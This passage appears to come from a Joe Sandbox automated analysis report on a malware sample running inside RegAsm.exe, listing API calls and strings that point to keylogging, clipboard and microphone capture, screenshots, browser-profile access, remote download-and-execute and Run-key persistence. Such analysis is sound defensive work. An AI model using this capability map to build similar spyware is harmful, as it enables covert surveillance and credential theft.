                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: MetricsSystem
                            APIs
                            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                              • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                            APIs
                            • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ErrorHandling__start
                            • String ID: pow
                            APIs
                            • _free.LIBCMT ref: 1000655C
                              • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                              • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                              • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                            • String ID: *?$.
                            APIs
                            • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418AF9
                              • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                            • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                              • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                              • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                            • String ID: image/jpeg
                            APIs
                              • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                            • __Init_thread_footer.LIBCMT ref: 0040B7D2
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Init_thread_footer__onexit
                            • String ID: [End of clipboard]$[Text copied to clipboard]
                            APIs
                            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • String ID: ACP$OCP
                            APIs
                            • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BE5
                              • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                            • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418C0A
                              • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                              • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                            • String ID: image/png
                            APIs
                            • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                            • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                            Strings
                            • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: LocalTime
                            • String ID: KeepAlive | Enabled | Timeout:
                            APIs
                            • Sleep.KERNEL32 ref: 0041667B
                            • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: DownloadFileSleep
                            • String ID: !D@
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: : $Se.
                            APIs
                            • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: LocalTime
                            • String ID: | $%02i:%02i:%02i:%03i
                            APIs
                            • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: alarm.wav$hYG
                            APIs
                              • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                              • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                            • CloseHandle.KERNEL32(?), ref: 0040B0EF
                            • UnhookWindowsHookEx.USER32 ref: 0040B102
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                            • String ID: Online Keylogger Stopped
                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                              • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: Exception@8Throw$ExceptionRaise
                            • String ID: Unknown exception
                            APIs
                              • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                              • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                              • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                              • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                            • _abort.LIBCMT ref: 10006DB0
                            • _free.LIBCMT ref: 10006DE4
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: ErrorLast_abort_free
                            • String ID: xV
                            APIs
                            • waveInPrepareHeader.WINMM(00509000,00000020,?), ref: 00401849
                            • waveInAddBuffer.WINMM(00509000,00000020), ref: 0040185F
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: wave$BufferHeaderPrepare
                            • String ID: XMG
                            APIs
                            • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: LocaleValid
                            • String ID: IsValidLocaleName$kKD
                            • API String ID: 1901932003-3269126172
                            APIs
                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: UserProfile$\AppData\Local\Google\Chrome\
                            • API String ID: 1174141254-4188645398
                            APIs
                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                            • API String ID: 1174141254-2800177040
                            APIs
                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: AppData$\Opera Software\Opera Stable\
                            • API String ID: 1174141254-1629609700
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID: X8S
                            • API String ID: 269201875-2014517935
                            APIs
                            • GetKeyState.USER32(00000011), ref: 0040B686
                              • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                              • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                              • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
                              • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                              • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                              • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
                              • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
                              • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                            • String ID: [AltL]$[AltR]
                            • API String ID: 2738857842-2658077756
                            APIs
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell
                            • String ID: !D@$open
                            • API String ID: 587946157-1586967515
                            APIs
                            • GetKeyState.USER32(00000012), ref: 0040B6E0
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: State
                            • String ID: [CtrlL]$[CtrlR]
                            • API String ID: 1649606143-2446555240
                            APIs
                              • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                            • __Init_thread_footer.LIBCMT ref: 00410F64
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Init_thread_footer__onexit
                            • String ID: ,kG$0kG
                            • API String ID: 1881088180-2015055088
                            APIs
                            Strings
                            • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteOpenValue
                            • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                            • API String ID: 2654517830-1051519024
                            APIs
                            • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                            • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteDirectoryFileRemove
                            • String ID: pth_unenc
                            • API String ID: 3325800564-4028850238
                            APIs
                            • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                            • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ObjectProcessSingleTerminateWait
                            • String ID: pth_unenc
                            • API String ID: 1872346434-4028850238
                            APIs
                            • GetLastInputInfo.USER32(NG), ref: 0041BB87
                            • GetTickCount.KERNEL32(?,?,?,00415BDE), ref: 0041BB8D
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CountInfoInputLastTick
                            • String ID: NG
                            • API String ID: 3478931382-1651712548
                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                            • GetLastError.KERNEL32 ref: 00440D85
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast
                            • String ID:
                            • API String ID: 1717984340-0
                            APIs
                            • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411F2B), ref: 00411BC7
                            • IsBadReadPtr.KERNEL32(?,00000014,00411F2B), ref: 00411C93
                            • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                            • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastRead
                            • String ID:
                            • API String ID: 4100373531-0

                            Execution Graph

                            Execution Coverage:5.4%
                            Dynamic/Decrypted Code Coverage:9.2%
                            Signature Coverage:0%
                            Total number of Nodes:1990
                            Total number of Limit Nodes:56
38077->38011 38135 40b2cc 38078->38135 38080 402b0a 38081 40b2cc 27 API calls 38080->38081 38082 402b23 38081->38082 38083 40b2cc 27 API calls 38082->38083 38084 402b3a 38083->38084 38085 40b2cc 27 API calls 38084->38085 38086 402b54 38085->38086 38087 40b2cc 27 API calls 38086->38087 38088 402b6b 38087->38088 38089 40b2cc 27 API calls 38088->38089 38090 402b82 38089->38090 38091 40b2cc 27 API calls 38090->38091 38092 402b99 38091->38092 38093 40b2cc 27 API calls 38092->38093 38094 402bb0 38093->38094 38095 40b2cc 27 API calls 38094->38095 38096 402bc7 38095->38096 38097 40b2cc 27 API calls 38096->38097 38098 402bde 38097->38098 38099 40b2cc 27 API calls 38098->38099 38100 402bf5 38099->38100 38101 40b2cc 27 API calls 38100->38101 38102 402c0c 38101->38102 38103 40b2cc 27 API calls 38102->38103 38104 402c23 38103->38104 38105 40b2cc 27 API calls 38104->38105 38106 402c3a 38105->38106 38107 40b2cc 27 API calls 38106->38107 38108 402c51 38107->38108 38109 40b2cc 27 API calls 38108->38109 38110 402c68 38109->38110 38111 40b2cc 27 API calls 38110->38111 38112 402c7f 38111->38112 38113 40b2cc 27 API calls 38112->38113 38114 402c99 38113->38114 38115 40b2cc 27 API calls 38114->38115 38116 402cb3 38115->38116 38117 40b2cc 27 API calls 38116->38117 38118 402cd5 38117->38118 38119 40b2cc 27 API calls 38118->38119 38120 402cf0 38119->38120 38121 40b2cc 27 API calls 38120->38121 38122 402d0b 38121->38122 38123 40b2cc 27 API calls 38122->38123 38124 402d26 38123->38124 38125 40b2cc 27 API calls 38124->38125 38126 402d3e 38125->38126 38127 40b2cc 27 API calls 38126->38127 38128 402d59 38127->38128 38129 40b2cc 27 API calls 38128->38129 38130 402d78 38129->38130 38131 40b2cc 27 API calls 38130->38131 38132 402d93 38131->38132 38133 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38132->38133 38133->38015 38134->38005 38138 40b58d 38135->38138 38137 40b2d1 38137->38080 38139 40b5a4 GetModuleHandleW FindResourceW 38138->38139 38140 40b62e 
38138->38140 38141 40b5c2 LoadResource 38139->38141 38143 40b5e7 38139->38143 38140->38137 38142 40b5d0 SizeofResource LockResource 38141->38142 38141->38143 38142->38143 38143->38140 38151 40afcf 38143->38151 38145 40b608 memcpy 38154 40b4d3 memcpy 38145->38154 38147 40b61e 38155 40b3c1 18 API calls 38147->38155 38149 40b626 38156 40b04b 38149->38156 38152 40b04b ??3@YAXPAX 38151->38152 38153 40afd7 ??2@YAPAXI 38152->38153 38153->38145 38154->38147 38155->38149 38157 40b051 ??3@YAXPAX 38156->38157 38158 40b05f 38156->38158 38157->38158 38158->38140 38159->38023 38161 4032c4 38160->38161 38162 40b633 ??3@YAXPAX 38161->38162 38163 403316 38162->38163 38182 44553b 38163->38182 38167 403480 38380 40368c 15 API calls 38167->38380 38169 403489 38170 40b633 ??3@YAXPAX 38169->38170 38172 403495 38170->38172 38171 40333c 38171->38167 38173 4033a9 memset memcpy 38171->38173 38174 4033ec wcscmp 38171->38174 38378 4028e7 11 API calls 38171->38378 38379 40f508 6 API calls 38171->38379 38172->38025 38173->38171 38173->38174 38174->38171 38176 403421 _wcsicmp 38176->38171 38179 444a64 FreeLibrary 38178->38179 38180 444a83 38178->38180 38179->38180 38180->38025 38181->38026 38183 445548 38182->38183 38184 445599 38183->38184 38381 40c768 38183->38381 38185 4455a8 memset 38184->38185 38327 4457f2 38184->38327 38465 403988 38185->38465 38191 4455e5 38200 445672 38191->38200 38210 44560f 38191->38210 38193 4458bb memset memset 38197 414c2e 16 API calls 38193->38197 38195 4459ed 38201 445a00 memset memset 38195->38201 38202 445b22 38195->38202 38196 44595e memset memset 38203 414c2e 16 API calls 38196->38203 38204 4458f9 38197->38204 38198 44557a 38205 44558c 38198->38205 38445 4136c0 38198->38445 38476 403fbe memset memset memset memset memset 38200->38476 38207 414c2e 16 API calls 38201->38207 38212 445bca 38202->38212 38213 445b38 memset memset memset 38202->38213 38208 44599c 38203->38208 38209 40b2cc 27 API calls 38204->38209 38449 444b06 38205->38449 38217 445a3e 38207->38217 
